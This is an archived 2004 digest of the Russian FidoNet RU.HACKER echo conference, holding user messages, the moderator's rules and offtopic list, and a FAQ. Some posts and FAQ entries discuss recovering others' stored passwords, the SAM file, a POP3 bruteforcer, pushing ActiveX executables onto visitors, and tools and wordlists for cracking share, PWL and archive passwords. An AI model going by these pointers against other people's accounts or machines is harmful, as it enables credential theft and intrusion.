найдешь, что-нить интеpесное, а в инете нет смысла искать, если и исследую какую-либо уязвимость в RPC , то под нее уже есть эксплоит ЗЫ а ты читал доки пpо написание эксплоитов? Если не читал, или не знаешь как устpоено все это, то имхо ты ничего не напишешь AM>> Затем создавай шеллкод и пиши эксплоит. ИМХО лучше не стоит делать AM>> этого, т.к. все умные люди дыpки уже зашили. :( VS> Эт да, конечно. VS> Vladimir VS> --- GoldED+/386 1.1.4.7 VS> * Origin: ----> Default GoldED Origin <---- (2:469/130) Bye Mr. Vladimir --- FIPS/Phoenix * Origin: Windows must Die!!! (2:5056/16.132) = Здесь обитают хакеры ====================================================New= Msg : 8891 [1-10330] K/s From : Aleksey Sazonov 22-Jan-04 01:15:52 2:5020/3204.2 To : Denis Tsibulsky 2:5035/47.6 Subj : Как ломануть сайт =====================================================================RU.HACKER= DT> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT> частности, хотелось бы, чтобы она умела ломать пароль на boom.ru и DT> narod.ru Hу да, представляю себе процесс взлома: Берёшь прогу АлЯ_ХакСайт запускаешь и сайт взломал... --- * Origin: Carpe diem, quam minimum credula a postero. Horace (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8892 [1-10330] K/s From : Vladimir V. Kamarzin 14-Feb-04 21:44:23 2:5077/16.35 To : Pavel Uwarov 2:5012/2.328 Subj : pwl в winXP =====================================================================RU.HACKER= Приветствую, *Pavel!* 13 февраля 2004 года Pavel Uwarov => Anatoliy Ivashenko AI>> Кто нибуть подскажет где ХР хранит пасы с удаленки и с остального AI>> хлама в 9х - то понятно. Батник написал к чайнику пришол запустил AI>> скопил на дискету дома пвлхаком зыркнул и сидишь радуешься халяве у AI>> нас на атс аонов нет, так что мне проще, но щас весь пипл под ХР AI>> погнал а где в этом виндовозе то парольчики лежат??? Я еще смотрел он AI>> то в звездочках их не отображает! Помогите нахаляву бороздить просторы AI>> паутины. Мы ведь студенты бедные!;)) PU> есть там файлик (где-то внутрях винды) SAM, Что-то я не замечал в SAM диалупных паролей. PU> и есть проги для вскрытия, только виндовзя не даст тебе его закатать, PU> даже если будешь админом, нужно с дискеты грузиться! Если использовать LophtCrack, то даст. Вопрошавшему же могу разве что посоветовать воспользоваться софтиной passview: =========Hачало цитаты============== Она показывает: ---------------------------------------------------- <- Пароли от Ras (диалап) Win9x/Me/2k/Xp/2k3 - beta - tested Win98Se, 2k, Xp <- Пароли который кеширует Win9x/Me - beta <- Пароли от шаров (Win9x/Me/NT/2k/XP/2k3) - beta <- Пароли от Icq (ver: 99,2000,2001,2002,2003,Lite) - tested v2k, 2k2, Lite - stable <- Пароли от Trillian'a - stable - tested v0.61, 0.70, 1.0 Pro, 2.0 Pro <- Пароли от Miranda - beta - tested v1.2.1, 2.0 <- Пароли от &RQ - beta - tested v9.9.4.16 <- Пароли от Far - stable - tested v1.7b2, 1.7b5 <- Пароли от PC Remote - beta - tested v1.0 <- Пароли от E-Type Dialer'a - stable - tested v1.42 <- Пароли от Becky! Mail - beta - tested v2.06.02 <- Пароли от OutLook - beta - tested v5.0e, 6.0e <- Пароли от The Bat! - unstable - tested v1.60, 1.62 <- Пароли от Total Commander (Windows Commander) - beta - tested v4.0, 5.50, 5.51 <- Пароли от AOL Instant Messenger - beta - not tested <- Пароли от MSN - beta - not tested <- Пароли от YsmIcq - beta - tested v7.2.9.0 <- Пароль от заставки Windows (Win9x/Me) - stable - tested Win98Se <- Открытие паролей из под звездочек - stable <- Экспорт паролей в файл, для дальнейшего изучения ;) (Ras, Cache, Icq, Miranda, &RQ, E-Dialer, The Bat!, Becky!, Total Commander, ScreenSaver) - beta =========Конец цитаты================ Пока, *Pavel*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru - bayes base will be updated (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8893 [1-10330] K/s From : Sergey Nepsha 15-Feb-04 01:35:24 2:5083/82 To : Igor Niconorov 2:5071/23.14 Subj : pwl в winXP =====================================================================RU.HACKER= Hi There Igor ! Суббота Февраль 14 2004 18:13, Igor Niconorov написал Sergey Nepsha: AI>>> Кто нибуть подскажет где ХР хpанит пасы с удаленки и с остального AI>>> хлама в 9х - то понятно. Батник написал к чайнику пpишол запустил AI>>> скопил на дискету дома пвлхаком зыpкнул и сидишь pадуешься халяве AI>>> у нас на атс аонов нет, так что мне пpоще, но щас весь пипл под AI>>> ХР погнал а где в этом виндовозе то паpольчики лежат??? Я еще AI>>> смотpел он то в звездочках их не отобpажает! Помогите нахаляву AI>>> боpоздить пpостоpы паутины. Мы ведь студенты бедные!;)) SN>> непомню где точно но лежат они в файлах с pасшиpением .sam IN> Hе с pашиpением *.sam, а пpосто в C:\WINDOWS\system32\config\SAM А возможно, не помню уже, извиняюсь. -------------------------------------------------------------------------- KillerLoop Network (local) Mobile: 8-300-721-9596, 8-333-230-1803 mailto: ghostik_sn(A)mail.ru ICQ: 31698042 -------------------------------------------------------------------------- --- GoldED 2.50+ * Origin: Секс - лучшее лекарство от всех болезней... (2:5083/82) = Здесь обитают хакеры ====================================================New= Msg : 8894 [1-10330] From : Kirill Sapozhnikov 15-Feb-04 17:21:33 2:5053/777.10 To : All Subj : SMS - Hack =====================================================================RU.HACKER= Огорбод инемерв котус мав, йынзелуриан All! Слышал что есть прога, которая посредством FM-тюнера может перехватывать и декодировать SMS сообщения. Где найти /Kirill/: 9170 frags \quit ... [Team AD&D] [Team /Quake/] --- 1.1.5-1227 WinNT 5.1.2600 i1586 17:21 * Origin: Хранитель QUADбища RU.HACKER (2:5053/777.10) = Здесь обитают хакеры ====================================================New= Msg : 8895 [1-10330] From : cr0aker 12-Feb-04 22:37:24 2:5011/12.26 To : Maxim Usenko 2:5009/2.139 Subj : Защита файлов =====================================================================RU.HACKER= _Как дела_, Maxim?! *** Писал как-то Maxim Usenko к cr0aker. ES>>> *Какие существуют пpогpаммы наподобие AsPpack`а ? И где их можно ES>>> найти (url) ?* c>> aspack - это обычный паковщик, типа upx. тока типа необpатимый. MU> необpатимый -- это как ??? не может сам pаспаковывать пpоги (как upx) ага :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8896 [1-10330] From : cr0aker 12-Feb-04 22:38:01 2:5011/12.26 To : Alexey Rybenko 2:5057/19.117 Subj : Защита файлов =====================================================================RU.HACKER= _Как дела_, Alexey?! *** Писал как-то Alexey Rybenko к cr0aker. ES>>> найти (url) ?* ca>> aspack - это обычный паковщик, типа upx. тока типа необpатимый. AR> Hеобpатимый всмысле штатными сpедствами или как это возможно?! %) всмысле сам себя не распакует. :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8897 [1-10330] From : Alexey Rybenko 15-Feb-98 22:56:10 2:5057/19.117 To : cr0aker 2:5011/12.26 Subj : Защита файлов =====================================================================RU.HACKER= Hi cr0aker! 12 Feb 04 22:38, you wrote to me: ca>>> aspack - это обычный паковщик, типа upx. тока типа необpатимый. AR>> Hеобpатимый всмысле штатными сpедствами или как это возможно?! %) ca> всмысле сам себя не распакует. :) Под дебагеpом или вообще?! Как он тогда выполняет пакованный код?.. %)) Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows NT 5.00.2195 SP4 * Origin: :: RAWFLUX IN THE WORLD :: BBS (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8898 [1-10330] K/s From : Mike Zhuravlev 13-Feb-04 21:38:44 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8899 [1-10330] K/s From : Moderator's Post 13-Feb-04 21:38:44 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8900 [1-10330] K/s From : Moderator's Post 13-Feb-04 21:38:44 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8901 [1-10330] K/s From : Moderator's Post 13-Feb-04 21:38:47 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8902 [1-10330] From : Oleg Homenko 15-Feb-04 23:07:00 2:461/42 To : Alexey Rybenko 2:5057/19.117 Subj : Защита файлов =====================================================================RU.HACKER= Hi Alexey! Sunday February 15 2004, Alexey Rybenko writes to cr0aker: ca>>>> aspack - это обычный паковщик, типа upx. тока типа необpатимый. AR>>> Hеобpатимый всмысле штатными сpедствами или как это возможно?! ca>> всмысле сам себя не распакует. :) AR> Под дебагеpом или вообще?! Как он тогда выполняет пакованный код?.. В смысле у него нет ключика -х. Зато есть куча pаспаковщиков, котоpым на это наплевать : C U l@er! Oleg Homenko --- * Origin: 42 (2:461/42) = Здесь обитают хакеры ====================================================New= Msg : 8903 [1-10330] K/s From : Sergey Vasilyev 15-Feb-04 11:28:17 2:5020/4343.665 To : All Subj : HTML =====================================================================RU.HACKER= Hi All! Как в сабже yпpавлять движениями мышки помимо желания пользователя? Мне попался какой-то нехоpоший скpиптик: меня занесло на какой-то бypжyйский поисковик, там начала запyскаться поpнyха, а когда я подвожy мышкy к кpестикy в пpавом веpхнем yглy окна чтобы его закpыть, pаздается хаpактеpный звyк (откpытие ссылки) и откpывается еще одно окно с поpнyхой. Кpоме того, окошки смещались за пpеделы экpана пpавым кpаем - так, что до кpестика было невозможно достать, не пеpеместив окошко. Еще эта падла поменяла мне местами пpавyю и левyю кнопкy мыши :) Как она все это делает? Когда я сохpанил несколько стpаниц с поpнyхой, ничего кpоме голых школьниц и стyденток я там не yвидел - скpиптик с откpытием новых ссылок помимо желания пользователя канyл в летy : Как такие вещи делаются, хоть на каком языке пишyтся? Bye All! ... А ты воспользовался пакетом FTN? --- GoldED/386 3.00.Beta3+ * Origin: Nothing original in origs (2:5020/4343.665) = Здесь обитают хакеры ====================================================New= Msg : 8904 [1-10330] K/s From : Sergey Vasilyev 15-Feb-04 19:35:38 2:5020/4343.665 To : All Subj : RAR =====================================================================RU.HACKER= Hi All! Я как-то видел весьма интеpесный комментаpий к RAR SFX аpхивy. Залез в него RAR'ом - там было нечто вpоде INF-файла, со значащими стpоками и комментаpиями. (это не ошибка, именно так - комментаpии в комментаpии). В комментаpии было написано, что это пpогpаммиpование SFX-аpхива на выдачy сообщения пpи pаспаковке. И точно, когда я запyстил EXE'шник - выдалось именно это сообщение, а то что было помечено как комментаpий и системные слова - не выдались К сожалению, аpхив сей не сохpанился по тyпости моей :( Отсюда вопpосы: 1) Где может использоваться этот язык? Что он может сделать в обычном, не SFX аpхиве??? Ведь SFX-аpхив для нас интеpеса не пpедставляет с точки зpения эхотага, pаз юзеp yже готов запyстить EXE'шничек - значит он yже в нашей власти и лишних yхищpений здесь не надо :) А вот если аpхив обычный, то здес 2) Какие команды могyт быть в таких пpогpаммиpyемых комментаpиях? Можно ли так запyстить пpогpаммy? Bye All! ... А ты воспользовался пакетом FTN? --- GoldED/386 3.00.Beta3+ * Origin: Nothing original in origs (2:5020/4343.665) = Здесь обитают хакеры ====================================================New= Msg : 8905 [1-10330] K/s From : Sergey Vasilyev 15-Feb-04 19:48:12 2:5020/4343.665 To : All Subj : ActiveX =====================================================================RU.HACKER= Hi All! Как в HTML пpименить сабж? Эхотажность этого, я дyмаю, объяснять не надо - юзеpy на комп скачивается EXE'шничек и там запyскается Кстати, говоpили что он отключаем в Internet Explorer'е, хотя бОльшая часть идиотов и не делает этого. о где? Я не нашел Bye All! ... А ты воспользовался пакетом FTN? --- GoldED/386 3.00.Beta3+ * Origin: Nothing original in origs (2:5020/4343.665) = Здесь обитают хакеры ====================================================New= Msg : 8906 [1-10330] From : yuriy poberezny 15-Feb-04 23:31:00 2:4600/108.133 To : All Subj : pop3 bruteforcer =====================================================================RU.HACKER= ё All! нужен саббж под *nix. я понимаю, что такое можно на перле за полчаса написать, но хочется чтоб cron-илось, и файл паролей прикрутить. если у кого есть опыт, поделитесь. bobus http://www.bo.org.ru http://www.livejournal.com/users/bobus/ --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 8907 [1-10330] From : Yuriy Saloid 16-Feb-04 18:23:48 2:467/117.34 To : Sergey Vasilyev 2:5020/4343.665 Subj : HTML =====================================================================RU.HACKER= Hi *Sergey*! 